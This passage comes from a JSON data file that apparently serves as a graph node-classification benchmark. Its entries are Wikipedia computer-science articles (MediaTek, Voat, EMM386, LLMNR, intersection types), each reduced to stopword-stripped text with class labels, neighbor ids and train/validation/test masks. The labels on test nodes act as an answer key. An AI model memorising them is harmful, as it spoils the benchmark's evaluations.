      10734,
      1776,
      9335,
      3450,
      3323,
      2172,
      10237
    ],
    "mask": "Test"
  },
  {
    "node_id": 8234,
    "label": 0,
    "text": "William_J._Barry:william j. barry william john barry born 1943 ireland one leading phoneticians germany came germany early years mainly educated university kiel renowned german phonetician klaus j. kohler 1992 appointed chair phonetics saarland university principal research areas speech synthesis rhythm segmental structures application linguistics questions pronunciation learning speech-language pathology speech technology general william j. barry innovative productive research close cooperation institute computational linguistics saarland university well german research center artificial intelligence also saarbruecken made saarbruecken institute phonetics outstanding pillar science europe 2007 w. j. barry held chair 16th international congress phonetic sciences icphs became emeritus professor 2008 barry currently council member international phonetic association editor phonus journal publications resulted cooperation researchers",
    "neighbors": [
      3533
    ],
    "mask": "Test"
  },
  {
    "node_id": 8235,
    "label": 6,
    "text": "Fdformat:fdformat fdformat name two unrelated programs",
    "neighbors": [
      3841,
      1801,
      8524,
      823,
      10967
    ],
    "mask": "None"
  },
  {
    "node_id": 8236,
    "label": 3,
    "text": "Unlink_(Unix):unlink unix unix-like operating systems unlink system call command line utility delete files program directly interfaces system call removes file name gnu systems directories like rm rmdir file name last hard link file file deleted soon program open also appears php node.js perl standard libraries form unlink built-in function like unix utility also used delete files delete file named foo one could type php one could use following function perl syntax identical php syntax save parentheses node.js almost others",
    "neighbors": [
      515,
      9733,
      8582,
      9735,
      3976,
      1801,
      4750,
      5397,
      2198,
      6812,
      7847,
      4398,
      1844,
      1336,
      7356,
      8644,
      965,
      8522,
      3659,
      9946,
      6120,
      4850,
      5492,
      9204,
      6138,
      5759
    ],
    "mask": "None"
  },
  {
    "node_id": 8237,
    "label": 3,
    "text": "MediaTek:mediatek mediatek inc. taiwanese fabless semiconductor company provides chips wireless communications high-definition television handheld mobile devices like smartphones tablet computers navigation systems consumer multimedia products digital subscriber line services well optical less disc drives headquartered hsinchu taiwan company 25 offices worldwide third largest fabless ic designer worldwide 2016 since founding 1997 mediatek creating chipsets global market mediatek also provides customers reference designs mediatek originally unit united microelectronics corporation umc tasked designing chipsets home entertainment products 28 may 1997 unit spun incorporated mediatek inc. listed taiwan stock exchange tsec 2454 code 23 july 2001 company started designing chipsets optical drives subsequently expanded chips dvd players digital tvs mobile phones smartphones tablets general mediatek strong record gaining market share displacing competitors entering new markets company launched division design products mobile devices 2004 seven years later taking orders 500 million mobile system-on-chip units per annum included products feature phones smart devices providing extensive system engineering assistance company allowed many smaller companies new entrants enter mobile phone market previously dominated large often vertically integrated corporations long broadly entrenched telecommunications industry mobile chip market quickly became main growth driver company mobile world congress 2014 mediatek unveiled new brand “ everyday genius ” dubbing term “ super-mid market ” vision aiming make smartphones accessible affordable wider market november 2014 1500 mobile models accounting 700 million units shipped globally 2014 using mediatek chips company posted revenues us 5.3 billion first half 2014 nearly much whole 2013 revenue growth however partly due revenue recognition acquisition mstar became effective beginning 2014 2005 mediatek acquired inprocomm wireless semiconductor design company producing 802.11a b a/g chips september 10 2007 mediatek announced intention buy analog devices cellular radio baseband chipset divisions us 350 million acquisition finalised january 11 2008 5 may 2011 mediatek acquired ralink technology corporation gaining products expertise wi-fi technology mobile non-mobile applications well wired dsl ethernet connectivity 11 april 2012 mediatek acquired coresonic global producer digital signal processing products based linköping sweden coresonic became wholly owned subsidiary mediatek europe 22 june 2012 mediatek announced would acquire rival taiwanese chipset designer mstar semiconductor inc. held strong market share position digital television chips initial phase deal saw mediatek taking 48 percent stake option purchase remaining stake later date following merger mediatek mstar delayed antitrust concerns china south korea finalized 1 february 2014 mediatek financial results subject variation financial success different product lines fluctuated mediatek relatively strong sales 2009/2010 based strong market position feature phone chipsets smartphone tablet products contributed mediatek sales income increase 2013 revenue recognition acquisition mstar semiconductor became effective february 2014 well continuing strong position smartphone tablet solutions main reasons sales growth seen 2014 2014 smartphone chips accounted approximately 50–55 revenue followed digital home products 25–30 includes digital television chips tablet chips 5–10 feature phone chips 5–10 wi-fi products 5–10 mediatek started shipping chips integrated 4g lte baseband volume second half 2014 later largest competitor qualcomm additional cost separate baseband chip required every 4g handset made mediatek offerings expensive prompted larger customers like alcatel one touch zte choose competing socs like qualcomm snapdragon 400 410 platforms negatively affecting mediatek revenue stream mediatek stock trading taiwan stock exchange symbol mediatek often followed industry-first strategy differentiate competition mt8135 system-on-chip soc tablets announced july 2013 industry first chip implement new arm big.little technology heterogeneous multi-processing variant mt8135 used amazon kindle fire hd tablet models also november 20 2013 mediatek launched mt6592 soc first system-on-chip soc eight cpu cores could used simultaneously contrast competing socs eight physical cores subset could active given time true octa-core trademark registered emphasize difference marketing materials 7 january 2014 mediatek announced development world first multimode receiver wireless charging contrast existing implementations compatible inductive resonant charging resulting mt3188 wireless charging chip certified power matters alliance wireless power consortium announced february 24 2014 25 february 2014 mediatek announced industry first five-in-one wireless chip soc mt6630 supports 802.11a/b/g/n/ac wifi bluetooth ant+ gps fm radio mediatek collaborated google first ultra hd tv platform android tv resulting development mt5595 digital television soc product first shipped lcd tv models made sony list devices using mediatek socs armv5 list devices using mediatek socs armv7 dual core list devices using mediatek socs armv7 quad core list devices using mediatek socs armv7 hexa core list devices using mediatek socs armv8 quad core list devices using mediatek socs armv8 octa core list devices using mediatek tablet processors consumer electronics show january 2015 mediatek announced mt2601 wearable devices based google ’ android wear software according mediatek small size allows fewer components lower current consumption compared chipsets market chip includes dual-core arm cortex-a7 cpu arm mali-400 mp gpu allows display resolutions qhd 960x540 combined mt6630 chip wireless connectivity mediatek mt2621 mt2625 two soc build lte nb-iot modems mt2625 launched 29 june 2017 mt2621 added 24 november mt6630 2014 five-in-one combo wireless soc integrating dual-band 802.11a/b/g/n/ac advanced wi-fi direct miracast support bluetooth 4.1 ant+ tri-band gps fm transceiver intended paired chips like mt6595 octa-core smartphone processor features integrated 4g modem built-in wi-fi/bluetooth/gps/fm functionality could also used tablets conjunction stand-alone application processor global navigation satellite system gnss modules result merger ralink mediatek added wireless network interface controllers ieee 802.11-standards socs mips cpus product portfolio consumer electronics show january 2015 mediatek announced mt5595 new digital television soc support google android tv platform adopted sony new lcd tv models",
    "neighbors": [
      3585,
      4098,
      7170,
      8711,
      11282,
      9235,
      11289,
      4124,
      1057,
      38,
      9255,
      4139,
      2097,
      1083,
      8253,
      10303,
      7745,
      7234,
      7747,
      2635,
      3664,
      10332,
      99,
      6247,
      6250,
      6252,
      6253,
      8812,
      6256,
      5237,
      10361,
      9851,
      6268,
      638,
      11391,
      644,
      11396,
      8327,
      9863,
      8842,
      7820,
      11405,
      146,
      659,
      1682,
      7833,
      666,
      5786,
      7835,
      4258,
      9913,
      8383,
      10945,
      1221,
      8909,
      4305,
      4821,
      2788,
      9964,
      9970,
      6391,
      760,
      3835,
      2814,
      781,
      6925,
      783,
      2838,
      8481,
      5417,
      810,
      3883,
      2862,
      7988,
      11062,
      1849,
      6971,
      6978,
      8003,
      10562,
      6981,
      3911,
      11080,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      5475,
      9581,
      11629,
      6001,
      373,
      3451,
      392,
      1428,
      4508,
      7068,
      5028,
      7077,
      9638,
      424,
      6057,
      426,
      938,
      9137,
      10675,
      9155,
      4041,
      9163,
      7631,
      6608,
      980,
      9174,
      10199,
      4569,
      2524,
      2525,
      9182,
      1014,
      3575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8238,
    "label": 5,
    "text": "Link-Local_Multicast_Name_Resolution:link-local multicast name resolution link-local multicast name resolution llmnr protocol based domain name system dns packet format allows ipv4 ipv6 hosts perform name resolution hosts local link included windows vista windows server 2008 windows 7 windows 8 windows 10 also implemented systemd-resolved linux llmnr defined rfc 4795 responding queries responders listen udp port 5355 following link-scope multicast address responders also listen tcp port 5355 unicast address host uses respond queries",
    "neighbors": [
      514,
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      425,
      10924,
      562,
      2996,
      9909,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      7364,
      2887,
      8391,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      7908,
      10341,
      10344,
      11112,
      238,
      367,
      8432,
      7411,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 8239,
    "label": 4,
    "text": "Real-time_recovery:real-time recovery information technology real-time recovery ability recover piece infrastructure server infrastructure failure human-induced error time frame minimal impact business operations real-time recovery focuses appropriate technology restores thus reducing recovery time objective rto minutes recovery point objectives rpo within 15 minutes ago minimizing test recovery objectives tro ability test validate backups occurred correctly without impacting production systems real-time recovery new market segment backup recovery disaster recovery market addresses challenges companies historically faced regards protecting importantly recovering data real-time recovery solution must contain minimum following attributes ability restore server minutes totally different virtual environment within 5 minutes ago require use additional agents options modules accomplish must able restore files seconds reason anyone backups able restore must perform sector level backups every 5 minutes ability self-heal broken incremental chain backups part image set get corrupted deleted must deliver improved recoverability data files databases data loss classified three broad categories data servers either physical hosts servers running guest servers within virtualization platform combination common customer environment mixture virtual physical servers attention detail must given approach protecting data servers regular intervals distinct advantages selecting technology virtual physical independent would limit number technologies organizations get trained skilled purchase deploy manage maintain ideal world reduce complexity managing multiple products protect physical virtual infrastructure reap rewards technology gets installed operating system level ensures consistency environment either physical virtual eliminates api compatibility disk volume structure limitations e.g raw mapped devices vmfs prior selecting realtime recovery strategy real-time recovery rtr solution disaster recovery planner refer organization business continuity plan indicate key metrics recovery point objective rpo recovery time objective recovery time objective various business processes process run payroll generate order e-mail etc. metrics specified business processes must mapped underlying systems infrastructure support processes recovery time objective recovery point objective metrics mapped infrastructure dr planner determine suitable recovery strategy system important note however business ultimately sets budget therefore rto rpo metrics need fit available budget business unit heads would like zero data loss zero time loss cost associated level protection historically made high availability solutions impractical unaffordable benefit implementing real-time recovery solution investment substantially reduced traditional tape based backup products",
    "neighbors": [
      6514,
      3366
    ],
    "mask": "Test"
  },
  {
    "node_id": 8240,
    "label": 8,
    "text": "Dreamwidth:dreamwidth dreamwidth online journal service based livejournal codebase code fork original service set ex-livejournal staff denise paolucci mark smith born desire new community based open access transparency freedom respect dreamwidth announced 11 june 2008 went open beta 30 april 2009 part features similar livejournal users journals may post entries webpage users may comment dreamwidth also provides shared group journals called communities areas dreamwidth differs significantly livejournal include following initially dreamwidth accounts could created invite code december 2011 invite codes turned originally experimental temporary measure significant increase spam accounts servers adjusted handle load invite codes turned back start new year planned new users still create account without use invite code free accounts limited features paid accounts exist two levels paid premium paid additional features time open beta launch limited number seed accounts also available response criticisms livejournal friending system dreamwidth split user relationships two parts subscriptions access control users may subscribe users journals grant access users read locked entries separate actions dreamwidth terminology reflects split instance friends page renamed reading page custom friends groups split access filters reading filters dreamwidth provides greater interoperability livejournal-based sites including ability import journal another site crosspost multiple sites greater functionality users log via openid addition search facilities brought livejournal paid account users search journal introduced 24 july 2009 livejournal initially free advertisements gradually incorporated 2017 ads shown non-paid readers pages dreamwidth remains free advertisements following features available livejournal available dreamwidth despite lack features dreamwidth acclaimed strong community transparency dreamwidth based upon free open-source server software designed run livejournal written primarily perl majority dreamwidth code available gpl sites use unlike many social networking sites using livejournal codebase insanejournal deadjournal dreamwidth code fork removing unwanted features advertising adding new ones described founders site rejected advertising model intrusive instead implemented payment system users purchase add-on premium features 2009 oscon presentation saw dreamwidth identified highly unusual among open-source projects number women development team 75 developers female compared around 1.5 field whole paolucci smith also spoke linux.conf.au 2010 dreamwidth development model invited speak web 2.0 expo oscon techniques dreamwidth accepted gsoc mentoring organization summer 2010 allotted seven students worked variety projects athena also known afuna fu introduced site first paid employee 7 april 2010 7 september 2010 mark smith announced stepped back dreamwidth front line moved work stumbleupon still owner dreamwidth along denise however following positive reactions dreamwidth diversity statement model inclusiveness various projects followed suit including python diversity list dreamfish",
    "neighbors": [
      8554,
      4367,
      8582,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 8241,
    "label": 3,
    "text": "EMM386:emm386 name emm386 used expanded memory managers microsoft ms-dos ibm pc dos digital research dr-dos created expanded memory using extended memory intel 80386 cpus also emm386.exe available freedos emm386.exe map memory unused blocks upper memory area uma allowing device drivers tsrs loaded high preserving conventional memory technique probably first appeared development cemm included compaq ms-dos 3.31 1987 microsoft version first appeared built-in windows/386 2.1 1988 standalone emm386.sys ms-dos 4.01 1989 flexible emm386.exe version appeared ms-dos 5.0 1991 expanded memory managers emm386 uses processor virtual 8086 mode forces memory accesses made dos applications go processors mmu introduced 386 page table entries used mmu configured emm386 map certain regions upper memory areas extended memory obtained emm386 extended memory manager himem.sys technique enabled ems expanded memory well umbs appear dos applications memory upper area fact mapped physical memory locations beyond 1mb temporarily shuts windows session 386 enhanced mode windows protected mode kernel taking role windows uses gemmis api take memory management emm386.exe global emm import specification gemmis supported via document available select number memory-manager vendors windows/386 paging import specification memory managers implemented gemmis api ones include emm386.exe quarterdeck qemm386.sys dosbox builtin dos notably missing freedos memory managers freedos memory managers himemx.exe jemm386.exe jemmex.exe implement gemmis api windows fails start running conjunction jemmxxx since windows fails take memory management role windows windows 98 windows 95 windows workgroups 3.1x windows 3.xx fail jemmxxx displaying jemmxx possible run windows 3.x windows workgroups 3.1x limited capabilities forcing windows use standard mode i.e using 80286 protected mode 80386 enhanced mode three conditions required note windows standard mode limited functionality lacks virtual memory skips 386enh section system.ini device drivers 386enh loaded",
    "neighbors": [
      5856,
      292,
      6148,
      6730,
      11562,
      9166,
      7983,
      6321,
      178,
      1237,
      9525,
      4441,
      4699,
      3323,
      1247
    ],
    "mask": "Test"
  },
  {
    "node_id": 8242,
    "label": 3,
    "text": "Compute_Node_Linux:compute node linux compute node linux cnl runtime environment based linux kernel cray xt3 cray xt4 cray xt5 cray xt6 cray xe6 cray xk6 supercomputer systems based suse linux enterprise server cnl forms part cray linux environment systems running cnl ranked 3rd 6th 8th among fastest supercomputers world",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6179,
      6180,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      1168,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      10411,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8439,
      2809,
      1795,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      823,
      6968,
      7992,
      318,
      3911,
      7497,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      1480,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 8243,
    "label": 4,
    "text": "Mks_vir:mks vir mks_vir formerly mks_vir – polish antivirus program created marek sell 1987 original reason creation software solutions existing market times satisfy author needs first versions dos distributed floppy disks apexim company marek sell worked updates issued monthly sent mail initially software delivered users personalized – main screen contained serial number data license owner despite program often used without license popularity confirmed appearing trojan horses impersonating program updates issued yet later together full version software demo versions issued allowed use program week educational reasons program contained descriptions operation viruses including demonstrations graphical sound effects 3.99 version lexicon viruses popular poland 1996 became winner third edition teraz polska contest 1996 mks company created marek sell became program producer website program bbs created company continued development program death author 2004 versions microsoft windows unix created online scanner based activex technology became available software website bankruptcy mks company 2011 property receiver sold rights mks_vir trademark arcabit company created years earlier former mks employees reactivated mks_vir product free antivirus application officially arcabit company resigned distribution support software 2014 march 1 although released brand new version may 2018 program versions",
    "neighbors": [
      10756,
      2213,
      10026,
      5356,
      6797,
      9166,
      7983,
      499,
      5492,
      823,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 8244,
    "label": 8,
    "text": "Voat:voat voat inc open source news aggregator social networking service registered community members submit content text posts direct links registered users vote submissions content entries organized areas interest called subverses website described several media outlets including quartz new york times new york us uk editions wired hub alt-right voat site hosts aggregated content discussion forums according wired voat aesthetically functionally similar reddit like reddit voat collection entries submitted registered users themed categories called subverses voat similar bulletin board system unlike reddit voat emphasized looser content restrictions ad-revenue sharing program voat written c programming language reddit written python january 2017 new yorker article voat described descendant 2chan 4chan 8chan users compete shock value verge described site imzy dark twin indirect products gamergate culture war name voat play words 'goat 'vote site mascot goat website uses colombian top level domain .co registered november 2014 founded april 2014 whoaverse website hobby project atif colo known voat atko student pursuing bsc later joined justin chastain known puttitout website labelled alternative reddit focus freedom expression december 2014 whoaverse changed name voat ease use february 2015 following accusations censorship reddit voat claimed seen “ large influx ” new users reddit early june 2015 reddit banned five subreddits harassment—the largest around 150,000 subscribers—many users reddit began create accounts voat influx new participants temporarily overloaded site causing downtime voat germany-based web hosting service host europe precursor webfusion shut service june 2015 alleged voat publicizing incitement people well abusive insulting youth-endangering content well illegal right-wing extremist content voat founder attributed shutdown political correctness voat also payments frozen paypal due sexually oriented materials services voat shut four subverses response two hosted sexualized images minors jailbait website continued accept donations bitcoin able continue functioning moved different hosting provider website continued experience downtime due ongoing distributed denial service ddos attack rendering 700,000 unique visitors unable access site early july 2015 following dismissal popular administrator reddit another influx reddit members registered voat leading traffic caused voat experience downtime developers website subsequently approached venture capitalists interested investing project also july voat alongside wikileaks subject bitcoin dust attack ddos attacks bitcoin attack slowed payment processing websites ddos attack launched july 12 unsuccessful due cloudflare services although side effect rendering third-party voat apps incapable functioning august 2015 voat became incorporated united states colo explained post announcing incorporation u.s. law far beats every candidate country ’ researched november 2016 users relocated voat reddit banned pizzagate conspiracy theory subreddit citing doxing harassment concerns january 2017 colo resigned ceo voat citing lack time available devote site colo replaced ceo chastain may 2017 chastain ran fundraising campaign announcing voat might shut due lack money november 2017 reddit incel community moved voat incel community banned reddit september 12 2018 reddit banned several subreddits dedicated discussing qanon conspiracy theory stating violated rules prohibiting inciting violence harassment dissemination personal information caused many q anon posters migrate voat",
    "neighbors": [
      8262,
      2409,
      8554,
      82,
      735,
      10995,
      441,
      8956,
      1087
    ],
    "mask": "Test"
  },
  {
    "node_id": 8245,
    "label": 0,
    "text": "JAPE_(linguistics):jape linguistics computational linguistics jape java annotation patterns engine component open-source general architecture text engineering gate platform jape finite state transducer operates annotations based regular expressions thus useful pattern-matching semantic extraction many operations syntactic trees produced natural language parsers jape version cpsl – common pattern specification language jape grammar consists set phases consists set pattern/action rules phases run sequentially constitute cascade finite state transducers annotations left-hand-side lhs rules consist annotation pattern description right-hand-side rhs consists annotation manipulation statements annotations matched lhs rule may referred rhs means labels attached pattern elements dhaval thakker taha osman phil lakin jape grammar tutorial http //gate.ac.uk/sale/thakker-jape-tutorial/gate 20jape 20manual.pdf",
    "neighbors": [
      1890
    ],
    "mask": "None"
  },
  {
    "node_id": 8246,
    "label": 2,
    "text": "User-Mode_Driver_Framework:user-mode driver framework user-mode driver framework umdf device-driver development platform first introduced microsoft windows vista operating system also available windows xp facilitates creation drivers certain classes devices standard device drivers difficult write must handle wide range system device states particularly multithreaded software environment badly written device drivers cause severe damage system e.g. bsod data corruption since standard drivers high privileges accessing kernel directly user-mode driver framework insulates kernel problems direct driver access instead providing new class driver dedicated application programming interface user level interrupts memory management error occurs new framework allows immediate driver restart without impacting system particularly useful devices intermittently connected system support hot swapping via bus technology usb firewire according microsoft umdf drivers simpler write debug kernel-mode drivers however umdf would used performance-intensive highly stateful devices first version umdf shipped part windows media player version 10 2004-10-12 code-named crescent designed support media transfer protocol driver public interfaces documentation provided later microsoft decided turn umdf device driver development platform umdf driver dll based microsoft component object model com however umdf use com loading unloading controlling concurrency uses com programming pattern example exploiting com iunknown interface startup umdf calls dllgetclassobject get pointer iclassfactory interface driver uses createinstance method iclassfactory interface create instance driver callback object driver object instance framework-provided iwdfdriver interface driver provides set callbacks via idriverentry com interface main entry point driver customization",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      6709,
      4174,
      4178,
      83,
      9813,
      603,
      608,
      2145,
      2146,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      10900,
      10902,
      11414,
      3224,
      3235,
      4771,
      7846,
      2221,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      3303,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      11030,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      7983,
      11570,
      315,
      5952,
      1348,
      844,
      5454,
      847,
      1366,
      10079,
      11616,
      2401,
      2943,
      9609,
      9612,
      8080,
      7064,
      9114,
      10654,
      8607,
      11683,
      4010,
      10157,
      6584,
      2493,
      7629,
      8161,
      6114,
      2027,
      9196,
      4590,
      11247,
      3573,
      9205,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 8247,
    "label": 4,
    "text": "Auslogics_Antivirus:auslogics antivirus auslogics antivirus antivirus software application intended protect user computer viruses spyware keyloggers cyber threats program also check computer vulnerability status provide privacy controls real-time virus protection encryption instant messaging program made used computers run microsoft windows operating system application version 14 latest writing article february 2012 supporting windows xp vista 7 program published auslogics software pty ltd australian-based company specializes maintenance software computers run microsoft windows operating system started 2008 company gained recognition two highly rated products – auslogics boostspeed auslogics disk defrag 2009 company partnered sony vaio develop part sony vaio care software installed vaio laptops desktop pc ’ 2011 auslogics premier elite partner status intel software partner program december 2011 comparative test performed independent antivirus software certification authority virus bulletin auslogics antivirus received vb100 award placed among top 10 programs 54 antivirus packages included test reactive proactive rap detection rates near 100 chart published virus bulletin program also received editor pick award software informer rated 5 stars download3000.com reviewed freedownloadscenter.com among program advantages reviewers cite easy-to-use configuration wizard settings levels novice intermediate advanced users high detection rates gaming mode feature main drawback mentioned reviews lengthy installation process",
    "neighbors": [
      2213,
      6797,
      8978,
      10392,
      7739
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8248,
    "label": 2,
    "text": "Tiny_Core_Linux:tiny core linux tiny core linux tcl minimal linux operating system focusing providing base system using busybox fltk developed robert shingledecker distribution notable small size 11 16 mb minimalism additional functions provided extensions tiny core linux free open source software licensed gnu general public license version 2 tiny core 16 mb recommended option new users wired network connection includes base core system dynamic fltk/flwm graphical user interface core 11 mb also known micro core linux smaller variant tiny core without graphical desktop though additional extensions added create system graphical desktop environment dcore 12 mb core made debian ubuntu compatible files uses import sce package format self-contained package format tiny core distribution since 5.x series corepure64 notable port core x86_64 architecture core plus 106 mb installation image distribution composed tiny core additional functionality notably wireless support non-us keyboard support picore raspberry pi port core minimal configuration tiny core needs least 46 mb ram order run core requires least 28 mb ram minimum cpu i486dx recommended configuration pentium 2 cpu 64 mb ram recommended tiny core developers describe tcl nomadic ultra small graphical desktop operating system capable booting cdrom pendrive frugally hard drive version 2.8.1 core designed run primarily ram three distinct modes operation",
    "neighbors": [
      516,
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      4637,
      10016,
      673,
      3745,
      10530,
      6436,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      823,
      439,
      56,
      1849,
      59,
      7483,
      3903,
      4673,
      10817,
      6979,
      2375,
      4039,
      5067,
      8907,
      2383,
      1110,
      9689,
      9693,
      2914,
      6371,
      8676,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      5356,
      7020,
      7534,
      2671,
      7920,
      8177,
      9074,
      499,
      5363,
      9461,
      10860,
      6393,
      11388,
      8957
    ],
    "mask": "None"
  },
  {
    "node_id": 8249,
    "label": 3,
    "text": "Aura_Battler_Dunbine:aura battler dunbine dunbine set byston well parallel world resembles countryside medieval europe kingdoms ruled monarchs castles armies unicorn-riding cavalry armed swords crossbows little winged creatures called ferario flying offering help hindrance depending mood main draw series insect-like aura battlers used population byston well fight wars fighting suits powered powerful energy called aura life energy certain people strong enough aura-energy act power-supply mecha making aura warriors series aired nagoya tv february 5 1983 january 21 1984 totaling 49 episodes three-episode anime ova sequel new story aura battler dunbine also known tale neo byston well released 1988 series later dubbed adv films released dvd north america along original japanese version 2003 however quickly became print 2018 available digital purchase now-defunct daisuki site sentai filmworks licensed series series followed shō zama suddenly finds pulled world byston well vehicular incident one rivals byston well located another dimension located sea land populated dragons castles knights powerful robots known aura battlers shō discovered possess powerful aura drafted byston well conflict pilot lavender-colored dunbine tomino creations dunbine cast populated nordic-looking military types elaborate costumes one side young japanese hero caught middle freedom fighters side beautiful female warriors abound sides hero falls main female lead romances cut across battle lines non-stop battles elaborate fighting craft land air cast pilot aura battlers although lots standard airships smaller fighters large warships well also typical tomino style large number named characters die tragically throughout series dunbine characters mecha storyline elements make appearances quite games super robot wars series banpresto notably first series banpresto gone make spinoff series taking place different universes alpha series impact however dunbine made appearances latter titles recently making something comeback first returning ux followed almost immediately operation extend bx gives recent use story dunbine units also appeared another century episode series first sequel another century episode 2 many units dunbine series included compared amount first game large part plot shō marvel piloting bilbine dunbine respectively also acquire unique team attack another century episode 3 story plot involve dunbine player unit continues appear bilbine shares combination attack nanajin wings rean also world set byston well first three games produced family soft msx 2000 title released playstation bandai new story aura battler dunbine also known tale neo byston well three episode anime ova released 1988 sequel tv series dunbine set roughly 700 years events show also second show set fictional medieval land byston well followed garzey wing wings rean directed toshifumi takizawa samurai 7 700 years passed since great war involving aura machines ended attempt conquer byston well black knight rabaan kidnaps princess nation baran-baran – nation said hold legendary treasure rabaan also captures shion young hunter shion princess remul escape rabaan castle return homeland find baran-baran treasure actually powerful aura battler sirbine riding sirbine shion fights rabaan evil forces",
    "neighbors": [
      2156,
      9006
    ],
    "mask": "Train"
  },
  {
    "node_id": 8250,
    "label": 3,
    "text": "WonderMedia:wondermedia wondermedia fabless soc company headquartered taipei taiwan subsidiary via technologies notable creating low cost processors used large number chinese android windows ce-based devices soc designs collectively called wondermedia prizm platform based reference implementations provided arm holdings",
    "neighbors": [
      3585,
      7170,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      2097,
      6705,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      10361,
      638,
      644,
      11396,
      8842,
      1677,
      146,
      659,
      1682,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      9964,
      1776,
      6391,
      3835,
      2814,
      781,
      6925,
      2838,
      5417,
      3883,
      2862,
      7988,
      11062,
      1849,
      6971,
      6978,
      8003,
      10562,
      6981,
      11080,
      5963,
      1871,
      1872,
      2388,
      6495,
      1377,
      9581,
      11629,
      6001,
      373,
      392,
      398,
      1428,
      4508,
      10658,
      7077,
      9638,
      9155,
      9163,
      7631,
      6608,
      980,
      9174,
      10199,
      4569,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 8251,
    "label": 9,
    "text": "Intersection_type:intersection type type theory intersection type assigned values assigned two given types particular value assigned type formula_1 type formula_2 value assigned intersection type formula_3 intersection type system generally ranges values two types overlap value belonging intersection two ranges assigned intersection type two types value safely passed argument functions expecting either two types example java class implements interfaces therefore object type safely passed functions expecting argument type functions expecting argument type intersection types composite data types similarly product types used assign several types object however product types assigned tuples tuple element assigned particular product type component comparison underlying objects intersection types necessarily composite restricted form intersection types refinement types intersection types useful describing overloaded functions example type functions taking number argument returning number type functions taking string argument returning string intersection two types used describe overloaded functions one based type input given contemporary programming languages including ceylon flow java scala typesript whiley see comparison languages intersection types use intersection types combine interface specifications express ad hoc polymorphism complementing parametric polymorphism intersection types may used avoid class hierarchy pollution cross-cutting concerns reduce boilerplate code shown typescript example type theoretic study intersection types referred intersection type discipline remarkably program termination precisely characterized using intersection types microsoft typescript supports intersection types improving expressivity type system reducing potential class hierarchy size demonstrated follows following program code defines classes method returning object either type additionally function resp requires object type resp argument //produces eggs //produces milk //produces random number //requires egg function eategg egg egg //requires milk function drinkmilk milk milk following program code defines ad hoc polymorphic function invokes member function given object function two type annotations namely connected via intersection type constructor specifically applied argument type returns object type type applied argument type returns object type type ideally applicable object possibly chance method //given chicken produces egg given cow produces milk let animaltofood chicken egg cow milk finally following program code demonstrates type safe use definitions var chicken new chicken var cow new cow var randomnumbergenerator new randomnumbergenerator console.log randomnumbergenerator.produce //0.2626353555444987 //console.log animaltofood randomnumbergenerator //error argument type 'randomnumbergenerator assignable parameter type 'cow' console.log eategg animaltofood chicken //i ate egg //console.log eategg animaltofood cow //error argument type 'milk assignable parameter type 'egg' console.log drinkmilk animaltofood cow //i drank milk //console.log drinkmilk animaltofood chicken //error argument type 'egg assignable parameter type 'milk' program code following properties minimalistic example realized using inheritance instance deriving classes base class however larger setting could disadvantageous introducing new classes class hierarchy necessarily justified cross-cutting concerns may outright impossible example using external library imaginably example could extended following classes may require additional classes interfaces specifying whether produce method available whether produce method returns food whether produce method used repeatedly overall may pollute class hierarchy minimalistic example already shows duck typing less suited realize given scenario class contains method object valid argument example realized using duck typing instance introducing new field classes signifying objects corresponding type valid arguments however would increase size respective classes especially introduction methods similar also non-local approach respect example realized using function overloading instance implementing two methods typescript solution almost identical provided example programming languages java require distinct implementations overloaded method may lead either code duplication boilerplate code example realized using visitor pattern would require animal class implement method accepting object implementing interface adding non-local boilerplate code function would realized method implementation unfortunately connection input type result type would difficult represent one hand intersection types used locally annotate different types function without introducing new classes interfaces class hierarchy hand approach requires possible argument types result types specified explicitly behaviour function specified precisely either unified interface parametric polymorphism duck typing verbose nature intersection types unfavorable therefore intersection types considered complementary existing specification methods dependent intersection type denoted formula_4 dependent type type formula_2 may depend term variable formula_6 particular term formula_7 dependent intersection type formula_4 term formula_7 type formula_1 type formula_11 formula_11 type results 